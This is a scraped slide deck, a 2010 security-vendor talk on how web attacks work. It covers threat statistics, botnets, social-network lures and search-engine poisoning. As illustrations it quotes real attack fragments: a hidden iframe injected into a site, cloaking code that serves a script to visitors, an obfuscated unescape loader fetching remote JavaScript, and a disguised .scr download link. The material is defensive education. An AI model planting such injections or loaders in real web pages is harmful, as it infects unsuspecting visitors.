Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024Manulife - Insurer Innovation Award 2024
Manulife - Insurer Innovation Award 2024
 

2010-11 The Anatomy of a Web Attack

  • 1. The Anatomy of a Web Attack Dennis Pike Systems Engineer Geo Specialists Lead – Americas Security dennis.pike@bluecoat.com Blue Coat Systems Confidential Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved.
  • 2. Agenda  State of the Web • Top categories • Top attacks  The Anatomy of a Web Attack • Lures to web threats • Examples  Dynamic Link Analysis 2 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 3. Best of the Worst  Top Web Category? >> Among the top ten active categories of 2009, social networking access accounted for 25 percent of all Web access activity  Top Web threat? >> Fake Antivirus was the most successful Web threat in 2009, followed by the Fake Video Codec offer. >>New Fake AV installer programs increased from an average of 300 to 1,462 per day in the second half of 2009. * >>Average lifetime of sites that redirect users to Web pages that try to install scareware decreased with a median lifetime dropping below 100 hours around April 2009, below 10 hours around September 2009, and below one hour since January 2010. * *Google Inc. 3 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 4. Email vs Social Networking  Do more people use email or social networking sites? >> According to Nielsen Co., in August 2009, 277 million people used email across the U.S., several European countries, Brazil and Australia, a 21 percent increase from the year before. But the number of users on social networking and other community sites jumped 31 percent to 302 million, bypassing the email user population by 10 percent. 4 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 5. Domain: Client% Domain: Client% Noteworthy Items ~Total~: youtube.com: 100% 35.7800 ~Total~: youtube.com: 100.00% 36.28 hotfile.com: 7.427 rapidshare.com: 6.36 Argument for Video (HTTP and Streaming) apple.com: 4.901 hotfile.com: 5.26 ninjacloak.com: 4.205 apple.com: 3.98 rapidshare.com: 4.135 ninjacloak.com: 3.97 megaupload.com: 2.977 megaupload.com: 2.54 googlevideo.com: 2.66 googlevideo.com: 2.33 fbcdn.net: 1.791 fbcdn.net: 1.85 mediafire.com: 1.492 fileserve.com: 1.75 windowsupdate.com: 1.305 playstation.net: 1.74 playstation.net: 1.241 mediafire.com: 1.68 fileserve.com: 1.187 windowsupdate.com: 1.42 4shared.com: 1.031 zshare.net: 0.78 zshare.net: 0.7793 facebook.com: 0.65 dailymotion.com: 0.6476 dailymotion.com: 0.62 google.com: 0.588 4shared.com: 0.6 facebook.com: 0.5764 novamov.com: 0.54 novamov.com: 0.5737 google.com: 0.54 microsoft.com: 0.4747 farmville.com: 0.52 farmville.com: 0.4626 adobe.com: 0.41 video filesharing © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 6. Changing Web Habits Top 10 Categories – 2009 Social Networking WebFilter/WebPulse, 62M+ Users Moved to #1 from #2 position 1. Social Networking Represents 25% of Top10 requests 2. Web Advertisements 3. Search Engines/Portals Web Email 4. Personals/Dating Dropped to #9 from #5 position 5. Pornography Users migrating to social networking 6. Computers/Internet 7. Audio/Video Clips 8. Adult/Mature Content Cyber Crime Leverages 9. Web Email Search engine poisoning 10. Illegal/Questionable Fake AV and Codec updates Popular site injections Death, Drama & Disaster lures Health & Wealth scams 6 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 7. Web Threats Rising Exponentially  2/3 of all known malicious code threats in 1 year (Symantec April’09)  1 in 150 Webpages infected in 2009 vs. 1 in 20,000 in 2006 (Kaspersky) 7 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 8. Distribution Power  Botnet computing power to: Pitch worthless products Hijack online banking accounts Top 5 Steal corporate data Botnets in 2009 Botnet Zeus Koobface B Koobface D Monkif A Clickbot Peak 1,070,000 number 812,000 599,000 of active 506,000 bots 375,000 How it spreads Search Results Facebook Twitter Social Networking USA TODAY Research – March 2010 8 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 9. An Invitation to Crime 2 – Program messages user’s friends asking 3 – Anyone who clicks them to click on a link on the link is asked to to a photo or video. enable a media player needed to see the images. Running the file turns the PC into 1 – An automated a bot. program logs on to social network using stolen user 4 – The bot steals the PC credentials. owners logon credentials, starting the cycle again. USA TODAY Research – March 2010 9 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 10. Web Evolution Static Pages Dynamic Pages Dynamic Pages Interactive Pages Publishing Model Community Model Single Host Pages Multi-Host Pages Nice to Have Must Have 10 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 11. Multi-Host Pages SPORT 6 Domains 13 Hosts 147 Requests 504 KB 14.5 Seconds 11 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 12. Paths to Malware Infection Link Farms Infected Site Search Engine Blogs, Forums Relay Bait Malware 12 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 13. End User…Infected Site www.inka.com <html> … <iframesrc="http://ho menameregistration. cn/in.cgi?income12" width=1 height=1 style="visibility: homenameregistration.cn/in.cgi?income12 hidden"></iframe><d iv id=“header”> … </html> 13 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 14. Web 2.0 and Search Engines Forums Blogs Search Wikis WWW Engine View Guestbooks 14 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 15. Web 2.0 and Search Engines Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… 15 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 16. 16 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 17. 17 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 18. Hijacked Website if (“search engine”) { xdesignstudios.com echo “…indexable content…” } else { echo “<body><script src="live.js"></script>” dir1 } index.php … id=fall+printable+coloring+pages id=free+printable+easter+drawings id=disney+printable+cartoon+characters id=free+printable+halloween+sheets id=girls+free+printable+organizer id=in+store+printable+catherines+coupons … live.js 18 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 19. End User…Search Engine Redirect index.php?id=hannah-montana-printable-birthday-invitations <body> <script src="live.js"> </script> document.write(unes live.js cape('%3C%53%43 %52%49%50%54% 20%20%20%20%6C %61%6E%67%75… http://cracksinside.com/red/gen.js 19 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 20. What just happened? Links… Links… Links… Links… Links… Links… Search WWW Engine Words… View Words… Words… Links… Links… Links… Redirect 20 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 21. Recent Examples - VBMania www.sharedocuments.com/library/PDF_Document21.025542010.pdf Email text www.sharedocument s.com/library/PDF_D ocument21.0255420 10.pdf members.multimania.co.uk/yahoophoto/PDF_Document21_025542010_pdf.scr 21 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 22. Recent Examples – Fake Warez 22 © Blue Coat Systems, Inc. 2010. All Rights Reserved. Blue Coat Systems Confidential
  • 23. © Blue Coat Systems, Inc. 2010. All Rights Reserved.